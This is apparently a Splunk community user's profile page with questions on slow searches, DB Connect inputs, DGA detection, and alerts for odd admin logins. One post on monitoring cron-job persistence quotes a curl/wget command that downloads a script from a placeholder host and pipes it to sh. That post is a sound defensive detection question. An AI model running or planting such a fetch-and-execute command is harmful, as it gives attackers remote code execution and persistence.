Activity Feed
- Karma Re: Why receiving an ERROR when updating mmapv1 storage engine to wiredTiger? for TassiloM. 4 weeks ago
- Got Karma for Re: search is very slow,no result found yet. 08-12-2024 07:52 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:36 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:33 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:29 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:28 PM
- Posted Re: search is very slow,no result found yet on Splunk Enterprise. 08-12-2024 06:27 PM
- Karma Re: How to get Splunk Webhook Alert actions to send entire search results as JSON payload? for Mathanjey. 07-24-2024 03:02 AM
- Posted search is very slow,no result found yet on Splunk Enterprise. 07-24-2024 01:02 AM
- Posted Re: splunk webhook alert how to send entire search result payload and send an email with entire search results on Alerting. 05-26-2024 08:23 PM
- Posted How to find high-frequency behavioral events using Splunk? on Splunk Search. 06-12-2023 01:02 AM
- Got Karma for Re: Can I call the static resources from an app that has global permissions?. 01-19-2022 12:23 PM
- Posted how to use splunk mobile? on Splunk Enterprise. 09-16-2021 06:57 PM
- Posted how to use splunk monitor a cron job add action on Splunk Enterprise. 08-06-2020 07:03 PM
- Karma Re: How to associate dbxquery results with search results? for sduff_splunk. 06-05-2020 12:50 AM
- Karma Re: Can I call the static resources from an app that has global permissions? for deepashri_123. 06-05-2020 12:50 AM
- Karma Re: Can I convert an indexer cluster into a single indexer without losing any data? for tiagofbmm. 06-05-2020 12:50 AM
- Karma Re: How does the search header cluster change to a single search header instance? for chrisyounger. 06-05-2020 12:50 AM
- Got Karma for Error migrating deprecated review status transitions. 06-05-2020 12:50 AM
- Karma Re: how to list all hosts and sourcetypes of all indexes quickly for niketn. 06-05-2020 12:49 AM
Topics I've Started
Subject | Karma | Author | Latest Post |
---|---|---|---|
0 | |||
0 | |||
0 | |||
0 | |||
0 | |||
0 | |||
0 | |||
0 | |||
0 | |||
0 |
08-12-2024
06:36 PM
1 Karma
Thank you, after my investigation of the problem, this is a super sparse search. I need to add IOPS to solve this problem. I raised the IOPS to 25,000. The search speed has changed amazing. It's done!
... View more
08-12-2024
06:33 PM
Thank you for your reply. I have 1 billion incidents every day ingesting the SPLUNK indexer. I checked the monitoring console. I didn't seem to see any abnormalities.
... View more
08-12-2024
06:29 PM
Thank you, I tried searching with term command, but search speed is still slow
... View more
08-12-2024
06:28 PM
cloud instance
... View more
08-12-2024
06:27 PM
They're on the same network, they're using intranet bandwidth, and they have 100MB bandwidth.
... View more
07-24-2024
01:02 AM
Hi, guys : forgive my English level first, it is not my native language. I have a distributed search which consists of an indexer instance and a search head instance, Their host specifications are as follows: indexer
CPU:E5-2682 v4 @ 2.50GHz / 16Core
Memory:32G
Dsik:1.8TB(5000IOPS)
search head:
CPU:E5-2680 v3 @ 2.50GHz / 16Core
Memory:32G
Disk:200GB(3400IOPS). I have 170G of raw logs ingested into splunk indexer every day ,5 indexes, one of which is 1.3TB in size. Its index name is tomcat , which stores the logs of the backend application. now the index is full. When I search for events in this index, the search speed is very slow. My search is index=tomcat uri="/xxx/xxx/xxx/xxx/xxx" "xxxx" I'm very sorry that I use xxx to represent a certain word because it involves the privacy issues of the API interface. I am searching for events from 7 days ago, no results found were returned for a long time,I even tried searching the logs for a specific day,but the search speed is still not ideal. If I wait about 5 minutes, I will gradually see some events appear on the page. I checked the job inspector, I found that command.search.index, dispatch.finalizeRemoteTimeline, and dispatch.fetch.rcp.phase_0 execution cost is high but these don't help me much.I tried leaving the search head and performing a search on the indexer web ui, but the search was still slow. this means that there is no bottleneck in the search head? During the search, I observed the various indicators of the host monitoring, the screenshot is as follows: It seems that the indexer server resources are not completely exhausted. So I tried restarting the indexer's splunkd service,Unexpectedly, the search speed seems to have been relieved,When I use the same search query and time range, it is gradually showing the events returned, although the speed does not seem to be particularly fast. Just as I was celebrating that I had solved the problem, my colleague told me the next day that the search speed seemed to be a little unsatisfactory again, although the search results would be gradually returned during the searching.so, this is not the best solution, it can only temporarily relieve. so, how do you think I should solve the problem of slow search speed? Is it to scale out the indexers horizontally and create a indexer cluster?
... View more
Labels
- Labels:
-
using Splunk Enterprise
05-26-2024
08:23 PM
thank you for your reply, but this will double the consumption of CPU and memory resources.
... View more
06-12-2023
01:02 AM
There are many accounts with different roles that often use the backend management system to query user information. Now, I need to use Splunk to search for accounts that frequently query user information.
Example events are as follows:
`_time=2022-12-01T10:00:01.000Z, account_id=1, query user infomation. _time=2022-12-01T10:00:02.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:03.000Z, account_id=1, query user infomation. _time=2022-12-01T10:00:07.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:09.000Z, account_id=1, query user infomation. _time=2022-12-01T10:00:11.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:12.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:13.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:14.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:22.000Z, account_id=2, query user infomation. _time=2022-12-01T10:01:27.000Z, account_id=3, query user infomation. _time=2022-12-01T10:00:27.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:30.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:33.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:34.000Z, account_id=2, query user infomation. _time=2022-12-01T10:00:36.000Z, account_id=2, query user infomation. _time=2022-12-01T10:01:37.000Z, account_id=3, query user infomation. _time=2022-12-01T10:01:39.000Z, account_id=1, query user infomation. _time=2022-12-01T10:01:45.000Z, account_id=3, query user infomation. _time=2022-12-01T10:01:47.000Z, account_id=3, query user infomation. _time=2022-12-01T10:01:55.000Z, account_id=3, query user infomation. _time=2022-12-01T10:01:59.000Z, account_id=3, query user infomation.`
We can obtain the average time frequency of queries by calculating the sum of time intervals between each query for each account, and then dividing it by the number of queries.
account_id =1 ,account 1 has queried 4 times and the total time interval is 2+6+30=38 seconds,so the average query time frequency is 38 seconds/3 times = 12.66 seconds/times.
account_id =2 ,account 1 has queried 12 times and the total time interval is 4+3+1+1+1+8+5+3+1+1+2=38 seconds,so the average query time frequency is 30 seconds/11 times = 2.72 seconds/times.
account_id =3 ,account 1 has queried 6 times and the total time interval is 10+8+2+8+4=32 seconds,so the average query time frequency is 32 seconds/5 times = 6.4 seconds/times.
now, I want to find accounts with query interval below 5 seconds. By manual calculation, we can see that the average query interval time for account_id=2 is 2.72s, so it may have exhibited abnormal behavior.It's possible that account 2 used an automation tool to crawl user information in the backend, given its short query intervals.
so how to use SPL statements to search for abnormal accounts with an average query interval of less than 5 seconds, and to calculate the total number of queries and the average interval for each account?"
... View more
Labels
- Labels:
-
stats
09-16-2021
06:57 PM
I want to view splunk dashboard and receive splunk alert on mobile device. my splunk enterprise instance (version 8.2.4) address is `http://192.168.1.100:8000`. now, I hava download `splunk mobile` app installed my Andriod device. but it let me enter the address ending in 'splunkcloud.com', it is only support splunk cloud ? any one kwon how to login my splunk enterprise on splunk mobile? and is ther a tutorial? thank you for anyone !
... View more
Labels
- Labels:
-
installation
-
using Splunk Enterprise
08-06-2020
07:03 PM
when some Trojans or virus are implanted in the Linux OS. it will add cron job to persist the Trojans . for example: curl -fsSL https://xxxx.com/raw/sByq0rym ||wget -q -0- https://xxx.com/raw/sByq0rym)|sh so, can I use splunk to monitor newly added cron job ?
... View more
Labels
- Labels:
-
using Splunk Enterprise
05-28-2020
07:31 PM
hey, I cant use |timechart count span=1d to calculate recent 8 days count, search result as follow:
_time count
2020/05/21 100
2020/05/22 120
2020/05/23 180
2020/05/24 200
2020/05/25 270
2020/05/26 380
2020/05/27 490
2020/05/28 680
now,I want to calculate the increase quantity of each day compared with the previous day. The results should be as follows
_time increase
2020/05/22 20
2020/05/23 60
2020/05/24 20
2020/05/25 70
2020/05/26 110
2020/05/27 110
2020/05/28 190
then use timechart show the increase quantity |timechart count span=1d
is there have a simple search statement to do it?
... View more
- Tags:
- splunk-enterprise
04-26-2020
06:40 PM
I want to show the number of successes and failures in a single value panel. How should I do this?
splunk version: 6.4.3
Like the screenshot below, green is successful, red is failures
index = test
|eval classification=if(eventtype="a","successful","failures")
|stats count by classification
... View more
- Tags:
- splunk
03-25-2020
12:40 AM
@Noah_Woodcock I don't know why. it haven't thrown an error now,but it didn't speed up the search
... View more
03-24-2020
11:45 PM
@richgalloway 7.2.3
... View more
03-19-2020
08:38 PM
I am trying to optimize the query speed of the db connect app . I have read the following post, it tell me I can use | noop search_optimization=false , but splunk return an error when I using.
Error in 'noop' command : invalid argument:'search_optimization'
this my search :
|noop search_optimization = false|dbxquery connection="connectTestDB" query="select * from clientData"
I also tried to add | noop search_optimization=false at end of dbxquery ,errors remain
... View more
03-15-2020
10:57 PM
thank you very much, so if i use index time, I can ignore time range of the alert settting, because index time in search effect takes precedence over time range?
... View more
03-12-2020
07:17 PM
@pdrieger_splunk
thank you very much for your reply,according to the second method you mentioned, do I need to modify the SPL of dga_feedback_kvstroe , modify the index = dga_proxy to domain_input , so that I can manually adjust the false-positive dga domain to legit, and for the fourth point, I don't quite understand how to do it. forgive me for just learned use MLTK
... View more
03-12-2020
03:08 AM
I have some real DNS data obtained from IDS, I can get it by the following search statement
index = ids sourcetype=suricata event_type=dns | table _time src_ip domain
I have read Operationalize Machine Learning part of the dga app for splunk
Setup notes:
1、Create an index that holds domain names and computed features (we used a index named "dga_proxy")
2、Activate scheduled searches (app menu: More > Alerts) to generate sample data and fill this index.
3、Check the macro domain_input in Settings > Advanced Search if you have custom naming
Following the instructions above, I did the following:
1、create an index , the index is named dga_prod
2、create a scheduled searches alert, the spl as follows:
index=ids event_type=dns
|stats latest(_time) as _time,values(src_ip) as src_ip,values(dest_ip) as dest_ip,values(dns.answer{}.rrtype) as type,values(dns.type) as dns_type,values(asset_name) as asset_name count by domain
| 'ut_shannon(domain)'
| 'ut_meaning(domain)'
| eval ut_digit_ratio = 0.0
| eval ut_vowel_ratio = 0.0
| eval ut_domain_length = max(1,len(domain))
| rex field=domain max_match=0 "(?\d)"
| rex field=domain max_match=0 "(?[aeiou])"
| eval ut_digit_ratio=if(isnull(digits),0.0,mvcount(digits) / ut_domain_length)
| eval ut_vowel_ratio=if(isnull(vowels),0.0,mvcount(vowels) / ut_domain_length)
| eval ut_consonant_ratio = max(0.0, 1.000000 - ut_digit_ratio - ut_vowel_ratio)
| eval ut_vc_ratio = ut_vowel_ratio / ut_consonant_ratio
| apply "dga_ngram"
| apply "dga_pca"
| apply "dga_randomforest" as class
| fields - digits - vowels - domain_tfidf*
|collect index = dga_prod
this alert like dga_eventgen , run every minute to fill dga_prod index.
3、edit domain_input macro , modify deafult index = dga_proxy to index=dga_prod
I have some questions:
1.Am I doing it correctly?
2.how to solve false positive, I see that some very normal domain names are also detected as dga, for example: my company's domain name brower.360.cn , www.xmind.cn , http.kali.org etc.... do I need add it to whitelist and how to do it?
3.I can't find more related dag app for splunk documents, videos, manuals, etc. I also just learned to use MLTK.
... View more
03-11-2020
08:51 PM
@pdrieger_splunk Is there a detailed reference manual?
... View more
02-26-2020
08:03 PM
hello everyone:
I have create db connect inputs, It reads record from the database every five minutes to the Splunk index.
but I found that there was a 30 minute difference between index time and event time. as follows:
index = test
|eval indextime=strftime(_indextime,"%Y/%m/%d %H:%M:%S")
|eval age=(_indextime - _time)/60
|table indextime _time age
--------------------------------------------------------------------------------------------------
indextime _time age
2020/02/27 11:40:00 2020/02/27 11:11:14 28.76667
2020/02/27 10: 30:00 2020/02/27 09: 59:36 30.40000
2020/02/27 10:25: 00 2020/02/27 09: 56: 48 28.20000
now, I want to create an alert to query important events , I hope this alert to run every 10 minutes, so how to set the time range in alert setting correctly, prevent missing important events or repeating alert?
time range: ???? How to set up correctly
cron expresion : */10 * * * *
... View more
01-06-2020
01:09 AM
Can DB connect app solve this problem? Or do I have to use Python scripts to do this?
... View more
12-19-2019
05:51 PM
I have a application that produced a database with a current date everyday. (i.e today is 2019.12.20,then database name is DATA.20191220). I will to create a db input, the sql statement as follows:
select * from "DATA.20191220"."dbo"."PRINT_LOG"
If it's tomorrow, the sql statement should become as follows
select * from "DATA.20191221"."dbo"."PRINT_LOG"
but I don't known how to connect a dynamic db name via DB connect App.
if u have a good idea,could u share it with me? thanks in advace.
forgive my English level, English is not my first language.
... View more
11-14-2019
05:02 PM
Does Splunk Enterprise Security have such anomaly detection function?
... View more
11-14-2019
12:32 AM
you may also be two scenarios to consider:
account admin may not have been logged in before. Now the account admin is logged in. If it is compared with the last time or previous 7 days, it will not find a historical data that can be referenced,this scenario needs to be alert.
account admin may have 2 or more IP addresses in the previous 7 days, In this scenario, I only need to compare the IP address of the last login. If it is inconsistent,then alert
... View more
11-14-2019
12:15 AM
hello everyone. I have an alert requirement . an administort has login the device. I want to compare his current IP address with that of the last time or previous 7 days,If different, then alert. However, there are multiple administrator accounts, the fixed IP address used by each administrator may also be different. For example, admin often uses IP 2.2.2.2 to log in to the device, and admin2 often uses IP 3.3.3.3 to log in to the device
On November 14, 2019 . These two administrators use a different IP login device than usual. I think this is an abnormal behavior, whether they login successfully or fail
_time account src_ip status
2019/11/14 14:30:00 admin2 4.4.4.4 Failed
2019/11/14 14:00:00 admin 1.1.1.1 success
2019/11/14 09:00:00 admin 2.2.2.2 success
2019/11/13 09:00:00 admin2 3.3.3.3 success
2019/11/13 08:00:00 admin 2.2.2.2 success
2019/11/12 11:00:00 admin 2.2.2.2 success
2019/11/11 10:00:00 admin 2.2.2.2 success
2019/11/10 00:00:00 admin 2.2.2.2 success
2019/11/09 09:00:00 admin2 3.3.3.3 Failed
2019/11/08 09:00:00 admin2 3.3.3.3 success
How should I write this spl and configure alert?
I want to check the login log every 5 minutes, and then compare the login IP with that of the previous 7 days OR last time
all the help will be appreciated
... View more
- Tags:
- splunk-enterprise